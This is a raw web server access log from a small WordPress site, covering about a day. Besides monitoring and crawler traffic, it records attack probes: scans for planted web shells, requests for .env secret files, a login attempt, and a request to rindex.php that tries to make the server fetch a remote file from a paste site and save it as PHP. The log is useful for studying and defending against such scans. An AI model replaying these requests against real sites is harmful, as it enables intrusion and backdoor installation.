43.153.101.148 - - [15/May/2023:16:03:31 +0200] "GET /wp-includes/widgets/ HTTP/1.1" 200 687 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:32 +0200] "GET /wp-includes/widgets/ HTTP/1.1" 200 687 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:34 +0200] "GET /wp-includes/css/ HTTP/1.1" 200 875 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:35 +0200] "GET /wp-includes/css/dist/ HTTP/1.1" 200 492 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:36 +0200] "GET /wp-includes/fonts/ HTTP/1.1" 200 479 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:39 +0200] "GET /wp-includes/images/ HTTP/1.1" 200 800 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:40 +0200] "GET /wp-includes/images/crystal/ HTTP/1.1" 200 570 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:41 +0200] "GET /wp-includes/images/media/ HTTP/1.1" 200 539 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:42 +0200] "GET /wp-includes/images/smilies/ HTTP/1.1" 200 749 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:43 +0200] "GET /wp-includes/images/wlw/ HTTP/1.1" 200 451 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:44 +0200] "GET /wp-includes/js/%20 HTTP/1.1" 404 17960 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:46 +0200] "GET /wp-includes/js/codemirror/ HTTP/1.1" 200 531 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:47 +0200] "GET /wp-includes/js/plupload/ HTTP/1.1" 200 549 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
43.153.101.148 - - [15/May/2023:16:03:48 +0200] "GET /.well-known/ HTTP/1.1" 404 17951 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
49.12.13.109 - - [15/May/2023:16:26:52 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [15/May/2023:16:26:52 +0200] "POST /wp-cron.php?doing_wp_cron=1684160812.7725570201873779296875 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684160812.7725570201873779296875" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [15/May/2023:17:04:26 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [15/May/2023:17:56:46 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [15/May/2023:17:56:47 +0200] "POST /wp-cron.php?doing_wp_cron=1684166207.0801379680633544921875 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684166207.0801379680633544921875" "WordPress/5.3.14; http://sobarlang-terapia.hu"
5.78.102.31 - - [15/May/2023:18:47:20 +0200] "GET /wp-content/updates.php HTTP/1.1" 404 17960 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
80.249.163.145 - - [15/May/2023:18:47:20 +0200] "POST /wp-cron.php?doing_wp_cron=1684169240.8846359252929687500000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684169240.8846359252929687500000" "WordPress/5.3.14; http://sobarlang-terapia.hu"
54.36.148.168 - - [15/May/2023:18:50:21 +0200] "GET / HTTP/1.1" 200 18012 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.17 - - [15/May/2023:18:50:25 +0200] "GET /wp-includes/js/wp-embed.min.js?ver=5.3.14 HTTP/1.1" 200 739 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.211 - - [15/May/2023:18:50:26 +0200] "GET /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2 HTTP/1.1" 200 2409 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.101 - - [15/May/2023:18:50:27 +0200] "GET /wp-content/themes/twentyseventeen/style.css?ver=20190507 HTTP/1.1" 200 15806 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.30 - - [15/May/2023:18:50:28 +0200] "GET /wp-content/themes/twentyseventeen/assets/css/blocks.css?ver=20190105 HTTP/1.1" 200 1862 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.35 - - [15/May/2023:18:50:28 +0200] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.3.14 HTTP/1.1" 200 639 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.50 - - [15/May/2023:18:50:29 +0200] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.3.14 HTTP/1.1" 200 6132 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.77 - - [15/May/2023:18:50:30 +0200] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 33776 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.150 - - [15/May/2023:18:50:31 +0200] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 4014 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [15/May/2023:18:50:32 +0200] "GET /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=20161114 HTTP/1.1" 200 416 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.2 - - [15/May/2023:18:50:33 +0200] "GET /wp-content/themes/twentyseventeen/assets/js/global.js?ver=20190121 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
49.12.13.109 - - [15/May/2023:18:56:00 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
49.12.13.109 - - [15/May/2023:19:22:54 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [15/May/2023:20:18:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [15/May/2023:20:19:00 +0200] "POST /wp-cron.php?doing_wp_cron=1684174740.7908959388732910156250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684174740.7908959388732910156250" "WordPress/5.3.14; http://sobarlang-terapia.hu"
49.12.13.109 - - [15/May/2023:21:18:17 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [15/May/2023:21:18:19 +0200] "POST /wp-cron.php?doing_wp_cron=1684178299.1059150695800781250000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684178299.1059150695800781250000" "WordPress/5.3.14; http://sobarlang-terapia.hu"
54.214.154.114 - - [15/May/2023:22:05:06 +0200] "GET / HTTP/1.1" 200 18012 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
80.249.163.145 - - [15/May/2023:22:05:07 +0200] "POST /wp-cron.php?doing_wp_cron=1684181107.2622690200805664062500 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684181107.2622690200805664062500" "WordPress/5.3.14; http://sobarlang-terapia.hu"
34.219.148.137 - - [15/May/2023:22:05:36 +0200] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
212.237.51.151 - - [15/May/2023:22:09:06 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
212.237.51.151 - - [15/May/2023:22:49:47 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [15/May/2023:22:49:48 +0200] "POST /wp-cron.php?doing_wp_cron=1684183788.5125029087066650390625 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684183788.5125029087066650390625" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [15/May/2023:23:43:10 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [15/May/2023:23:43:21 +0200] "POST /wp-cron.php?doing_wp_cron=1684187001.9120700359344482421875 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684187001.9120700359344482421875" "WordPress/5.3.14; http://sobarlang-terapia.hu"
5.78.102.31 - - [16/May/2023:00:06:27 +0200] "GET /rindex.php?action=add¶meter=mqfrpgnjmt.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Feesxg%2Fraw HTTP/1.1" 404 18028 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
80.249.163.145 - - [16/May/2023:00:06:28 +0200] "POST /wp-cron.php?doing_wp_cron=1684188388.1074650287628173828125 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684188388.1074650287628173828125" "WordPress/5.3.14; http://sobarlang-terapia.hu"
5.78.102.31 - - [16/May/2023:00:06:35 +0200] "GET /rindex.php?action=add¶meter=mqfrpgnjmt.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Feesxg%2Fraw HTTP/1.1" 404 18031 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.161.186.53 - - [16/May/2023:00:16:03 +0200] "GET /radio.php HTTP/1.1" 404 17951 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
49.12.13.109 - - [16/May/2023:00:41:30 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:00:41:32 +0200] "POST /wp-cron.php?doing_wp_cron=1684190492.3436799049377441406250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684190492.3436799049377441406250" "WordPress/5.3.14; http://sobarlang-terapia.hu"
114.119.144.99 - - [16/May/2023:00:48:38 +0200] "GET /log/21/?C=D%3BO%3DA HTTP/1.1" 200 767 "http://sobarlang-terapia.hu/log/21/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
31.13.127.10 - - [16/May/2023:01:05:52 +0200] "GET /legutiallergia-sobarlang-terapia.htm HTTP/1.1" 404 17964 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
88.99.238.79 - - [16/May/2023:01:16:07 +0200] "GET /ads.txt HTTP/1.0" 404 52285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
5.161.210.65 - - [16/May/2023:01:31:35 +0200] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php HTTP/1.1" 404 18000 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
80.249.163.145 - - [16/May/2023:01:31:36 +0200] "POST /wp-cron.php?doing_wp_cron=1684193496.6593759059906005859375 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684193496.6593759059906005859375" "WordPress/5.3.14; http://sobarlang-terapia.hu"
49.12.13.109 - - [16/May/2023:01:40:40 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
212.237.51.151 - - [16/May/2023:02:30:40 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:02:30:41 +0200] "POST /wp-cron.php?doing_wp_cron=1684197041.1941781044006347656250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684197041.1941781044006347656250" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:03:09:34 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
5.78.102.31 - - [16/May/2023:03:20:51 +0200] "GET /radio.php HTTP/1.1" 404 17951 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
212.237.51.151 - - [16/May/2023:03:48:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:03:49:00 +0200] "POST /wp-cron.php?doing_wp_cron=1684201740.1209990978240966796875 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684201740.1209990978240966796875" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:04:26:56 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:04:26:57 +0200] "POST /wp-cron.php?doing_wp_cron=1684204017.4771249294281005859375 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684204017.4771249294281005859375" "WordPress/5.3.14; http://sobarlang-terapia.hu"
49.12.13.109 - - [16/May/2023:05:22:45 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
212.237.51.151 - - [16/May/2023:06:15:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:06:16:00 +0200] "POST /wp-cron.php?doing_wp_cron=1684210560.3906459808349609375000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684210560.3906459808349609375000" "WordPress/5.3.14; http://sobarlang-terapia.hu"
5.78.102.31 - - [16/May/2023:06:33:13 +0200] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 404 17966 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
80.249.163.145 - - [16/May/2023:06:33:14 +0200] "POST /wp-cron.php?doing_wp_cron=1684211594.5926439762115478515625 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684211594.5926439762115478515625" "WordPress/5.3.14; http://sobarlang-terapia.hu"
5.78.102.31 - - [16/May/2023:06:33:16 +0200] "GET /ccx/index.php HTTP/1.1" 404 17953 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.78.102.31 - - [16/May/2023:06:33:18 +0200] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 404 17966 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.78.102.31 - - [16/May/2023:06:33:19 +0200] "GET /wp-content/themes/ccx/index.php HTTP/1.1" 404 17962 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
212.237.51.151 - - [16/May/2023:07:02:02 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
212.237.51.151 - - [16/May/2023:07:41:19 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:07:41:21 +0200] "POST /wp-cron.php?doing_wp_cron=1684215681.7373180389404296875000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684215681.7373180389404296875000" "WordPress/5.3.14; http://sobarlang-terapia.hu"
49.12.13.109 - - [16/May/2023:08:40:25 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:08:40:27 +0200] "POST /wp-cron.php?doing_wp_cron=1684219227.0574879646301269531250 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684219227.0574879646301269531250" "WordPress/5.3.14; http://sobarlang-terapia.hu"
114.119.132.70 - - [16/May/2023:09:26:02 +0200] "GET /log/21/?C=S%3BO%3DA HTTP/1.1" 200 767 "http://sobarlang-terapia.hu/log/21/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
49.12.13.109 - - [16/May/2023:09:39:35 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:09:39:36 +0200] "POST /wp-cron.php?doing_wp_cron=1684222776.4676110744476318359375 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684222776.4676110744476318359375" "WordPress/5.3.14; http://sobarlang-terapia.hu"
5.78.102.31 - - [16/May/2023:09:43:53 +0200] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php HTTP/1.1" 404 18000 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
49.12.13.109 - - [16/May/2023:10:38:41 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:10:38:42 +0200] "POST /wp-cron.php?doing_wp_cron=1684226322.7509889602661132812500 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684226322.7509889602661132812500" "WordPress/5.3.14; http://sobarlang-terapia.hu"
91.229.77.2 - - [16/May/2023:10:55:20 +0200] "GET //.env HTTP/1.1" 404 17946 "-" "Go-http-client/1.1"
182.53.184.63 - - [16/May/2023:10:57:43 +0200] "GET /wp-login.php HTTP/1.1" 200 4807 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45"
182.53.184.63 - - [16/May/2023:10:57:44 +0200] "POST /wp-login.php HTTP/1.1" 200 5717 "http://sobarlang-terapia.hu/wp-login.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45"
212.237.51.151 - - [16/May/2023:11:19:14 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
87.121.221.50 - - [16/May/2023:11:36:19 +0200] "GET /wp-content/plugins/woocommerce-payments/changelog.txt HTTP/1.1" 404 17980 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
80.249.163.145 - - [16/May/2023:11:36:20 +0200] "POST /wp-cron.php?doing_wp_cron=1684229780.2340219020843505859375 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684229780.2340219020843505859375" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:11:58:17 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [16/May/2023:12:54:07 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:12:54:08 +0200] "POST /wp-cron.php?doing_wp_cron=1684234448.2509589195251464843750 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684234448.2509589195251464843750" "WordPress/5.3.14; http://sobarlang-terapia.hu"
54.36.149.50 - - [16/May/2023:12:57:23 +0200] "GET /robots.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.135 - - [16/May/2023:12:57:26 +0200] "GET / HTTP/1.1" 200 18015 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.51.151 - - [16/May/2023:13:33:26 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:13:33:26 +0200] "POST /wp-cron.php?doing_wp_cron=1684236806.8154571056365966796875 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684236806.8154571056365966796875" "WordPress/5.3.14; http://sobarlang-terapia.hu"
52.167.144.133 - - [16/May/2023:13:57:49 +0200] "GET /robots.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.221 - - [16/May/2023:13:57:58 +0200] "GET /sitemap.xml HTTP/1.1" 200 494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.237.51.151 - - [16/May/2023:14:24:31 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
52.167.144.133 - - [16/May/2023:15:09:43 +0200] "GET /robots.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
80.249.163.145 - - [16/May/2023:15:09:43 +0200] "POST /wp-cron.php?doing_wp_cron=1684242583.6146490573883056640625 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684242583.6146490573883056640625" "WordPress/5.3.14; http://sobarlang-terapia.hu"
40.77.167.221 - - [16/May/2023:15:09:55 +0200] "GET /sitemap.xml.gz HTTP/1.1" 200 497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.237.51.151 - - [16/May/2023:15:17:52 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [16/May/2023:16:17:40 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:16:17:41 +0200] "POST /wp-cron.php?doing_wp_cron=1684246661.5885059833526611328125 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684246661.5885059833526611328125" "WordPress/5.3.14; http://sobarlang-terapia.hu"
139.162.123.57 - - [16/May/2023:17:13:11 +0200] "GET /.env HTTP/1.1" 404 17946 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
80.249.163.145 - - [16/May/2023:17:13:11 +0200] "POST /wp-cron.php?doing_wp_cron=1684249991.9245359897613525390625 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684249991.9245359897613525390625" "WordPress/5.3.14; http://sobarlang-terapia.hu"
139.162.123.57 - - [16/May/2023:17:13:13 +0200] "GET /wp-content/ HTTP/1.1" 200 20 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
49.12.13.109 - - [16/May/2023:17:16:45 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
66.249.64.216 - - [16/May/2023:17:33:28 +0200] "GET /robots.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
80.249.163.145 - - [16/May/2023:17:33:29 +0200] "POST /wp-cron.php?doing_wp_cron=1684251209.5156240463256835937500 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684251209.5156240463256835937500" "WordPress/5.3.14; http://sobarlang-terapia.hu"
66.249.64.218 - - [16/May/2023:17:33:31 +0200] "GET /sitemap-pt-page-2012-01.xml HTTP/1.1" 200 487 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
49.12.13.109 - - [16/May/2023:18:15:52 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
212.237.51.151 - - [16/May/2023:18:52:10 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
80.249.163.145 - - [16/May/2023:18:52:11 +0200] "POST /wp-cron.php?doing_wp_cron=1684255931.5429039001464843750000 HTTP/1.1" 200 20 "http://sobarlang-terapia.hu/wp-cron.php?doing_wp_cron=1684255931.5429039001464843750000" "WordPress/5.3.14; http://sobarlang-terapia.hu"
212.237.51.151 - - [16/May/2023:19:30:38 +0200] "HEAD / HTTP/1.1" 200 - "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
